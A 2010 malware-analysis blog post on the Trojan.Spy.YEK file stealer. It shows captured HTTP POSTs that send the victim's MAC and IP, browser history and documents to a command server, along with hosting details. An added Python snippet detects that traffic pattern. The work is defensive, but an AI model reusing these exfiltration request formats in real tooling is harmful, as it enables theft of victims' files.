
Monday, 15 November 2010

Trojan.Spy.YEK - File Stealer

I came across a couple of blog posts (listed below) about "Trojan.Spy.YEK, the Corporate Spying Tool".

The blogs detail a spying trojan that scans your computer for key operating system information, archives (ZIP), document files including PDFs, emails and email address books.

The Shadowserver malware repository had the binary with MD5 hash e8f62bbf674ad74f3a25dbe0e7a0a473, so I wanted to give it a quick look to see exactly what it was doing and where it was going.

Initial Network Traffic

Upon launch, the binary did a DNS lookup for fullmooninfo.com, which resolved to 122.155.7.194.

[Screenshot: DNS queries]

After connecting to the server, the following HTTP POST was seen:

    POST /data/makarekiki/save.php HTTP/1.1
    Accept: */*
    Host: fullmooninfo.com
    Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Content-Length: 1360

Each POST to /data/makarekiki/save.php was associated with files and other information being sent to the server. The header of the POST always contained the MAC address and IP address of the infected machine. For example:

    POST /data/makarekiki/save.php HTTP/1.1
    Accept: */*
    Host: fullmooninfo.com
    Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Content-Length: 1360
    -----------------------------7d71f43a50782
    Content-Disposition: form-data; name="MAC"
    00-0C-29-D7-FA-34
    -----------------------------7d71f43a50782
    Content-Disposition: form-data; name="IP"
    192.168.77.222
    -----------------------------7d71f43a50782

Following this header, the actual data was sent. For example, in this case the urllog.txt file associated with the URL history of Internet Explorer was sent as follows:

    Content-Disposition: form-data; name="expo2010"; filename="urllog.dat"
    Content-Type: application/octet-stream
    1|http: //www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
    1|http: //update.microsoft.com/favicon.ico
    1|res: //C:\WINDOWS\system32\shdoclc.dll/dnserror.htm
    1|http: //www.msn.com
    1|http: //update.microsoft.com/windowsupdate/v6/default.aspx
    1|http: //update.microsoft.com/windowsupdate/v6/splash.aspx?ln=en-us&page=8
    1|http: //www.microsoft.com/favicon.ico
    1|http: //www.windowsmedia.com/MediaGuide/Home?WMPFriendly=true&locale=409&version=9.0.0.3250
    1|http: //update.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en-us&id=6
    1|http: //windowsmedia.com/redir/mediaguide.asp?WMPFriendly=true&locale=409&version=9.0.0.3250
    1|http: //www.microsoft.com/windows/internet-explorer/welcome.aspx
    1|http: //www.microsoft.com/favicon.ico
    1|about:Home
    1|http: //go.microsoft.com/fwlink/?LinkID=121792
    1|http: //home.microsoft.com
    1|http: //windowsupdate.microsoft.com
    1|http: //update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us

I then created a few example files called 'secret_document.doc' and 'secret_document.pdf' and placed them in the 'My Documents' folder. I soon saw the following traffic:

    POST /data/makarekiki/save.php HTTP/1.1
    Accept: */*
    Host: fullmooninfo.com
    Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Content-Length: 9645
    -----------------------------7d71f43a50782
    Content-Disposition: form-data; name="MAC"
    00-0C-29-D7-FA-34
    -----------------------------7d71f43a50782
    Content-Disposition: form-data; name="IP"
    192.168.77.222
    -----------------------------7d71f43a50782
    Content-Disposition: form-data; name="expo2010"; filename="secret_document.doc"
    Content-Type: application/octet-stream

This was followed by the contents of the document. I then saw the same for filename="secret_document.pdf".

I also noticed other POST requests associated with dropping a new binary called 'rebirth.exe', and another that requested the file="total_info.dat", which provides detailed information on the operating system configuration.
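The multipart structure above (victim MAC and IP fields, then a file part named "expo2010") is regular enough to parse and match in captured HTTP traffic. The following is an added example, not code from the original post: it reconstructs a sample POST modelled on the capture quoted above (the sample is constructed, not a real pcap) and returns the reasons it matches the exfiltration pattern.

```python
import re

# Constructed sample modelled on the POST quoted in the post above; not a real capture.
BOUNDARY = "---------------------------7d71f43a50782"
SAMPLE_POST = (
    "POST /data/makarekiki/save.php HTTP/1.1\r\n"
    "Host: fullmooninfo.com\r\n"
    "Content-Type: multipart/form-data; boundary=" + BOUNDARY + "\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)\r\n\r\n"
    "--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="MAC"\r\n\r\n00-0C-29-D7-FA-34\r\n'
    "--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="IP"\r\n\r\n192.168.77.222\r\n'
    "--" + BOUNDARY + '\r\nContent-Disposition: form-data; name="expo2010"; filename="secret_document.doc"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n<document bytes>\r\n"
    "--" + BOUNDARY + "--\r\n"
)

def parse_multipart_post(raw):
    # Returns (request line, lower-cased header dict, list of body parts).
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for key, _, value in (line.partition(":") for line in header_lines):
        headers[key.strip().lower()] = value.strip()
    match = re.search(r"boundary=([^;]+)", headers.get("content-type", ""))
    if not match:                        # not multipart: nothing to split
        return request_line, headers, []
    delimiter, parts = "--" + match.group(1).strip(), []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith("--"):       # "--boundary--" closes the body
            break
        part_head, _, data = chunk.strip("\r\n").partition("\r\n\r\n")
        name = re.search(r';\s*name="([^"]*)"', part_head)      # avoid matching filename=
        filename = re.search(r'filename="([^"]*)"', part_head)
        parts.append({"name": name.group(1) if name else None,
                      "filename": filename.group(1) if filename else None, "data": data})
    return request_line, headers, parts

def yek_indicators(raw):
    """Return the reasons a captured POST matches the exfiltration pattern described above."""
    request_line, headers, parts = parse_multipart_post(raw)
    reasons = []
    if "/data/makarekiki/save.php" in request_line:
        reasons.append("known C2 path")
    if headers.get("host") == "fullmooninfo.com":
        reasons.append("known C2 host")
    names = {p["name"] for p in parts}
    uploads = [p["filename"] for p in parts if p["filename"]]
    if {"MAC", "IP"} <= names and uploads:   # victim identifiers followed by a file upload
        reasons.append("MAC+IP fields followed by upload of " + ", ".join(uploads))
    return reasons
```

The host and path checks only catch this sample's infrastructure; the field-structure check is the one that survives a change of domain.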

fullmooninfo.com Hosting Provider

The following is the whois information for 'fullmooninfo.com'.

[Screenshot: fullmooninfo.com WhoIs]

Currently this domain is being hosted on IP address 122.155.7.194. This appears to be a shared host, as passive DNS queries show over 50 domains being hosted there.

This IP belongs to ASN 9931 - CAT-AP - The Communications Authority of Thailand.

Reverse DNS on that IP shows ns1-1557194.dragonhighspeed.com.

Current Status

While the server is still active, the URLs that are to receive the files and information return a '404 Not Found':

    POST /data/makarekiki//cas2.php?a1=1008&a2=1 HTTP/1.1
    Accept: */*
    Host: fullmooninfo.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache

    HTTP/1.0 404 Not Found

Additionally, browsing to the main page of fullmooninfo.com yields the following error:

[Screenshot: fullmooninfo.com]

Conclusion

While in-depth analysis of the malware still needs to be done, initial examination indicates that this is something that should be followed closely. Shadowserver is in the process of attempting to sinkhole any domains associated with this trojan, so that any victim IPs can be identified and reported.

Reference

The following links provide additional information on Trojan.Spy.YEK:

http://www.malwarecity.com/blog/trojanspyyek-the-corporate-spying-tool-931.html

http://www.pcworld.com/article/210499/new_trojan_threat_emerges.html

Posted November 15, 2010, at 10:28 PM by Andre' - Semper_Securus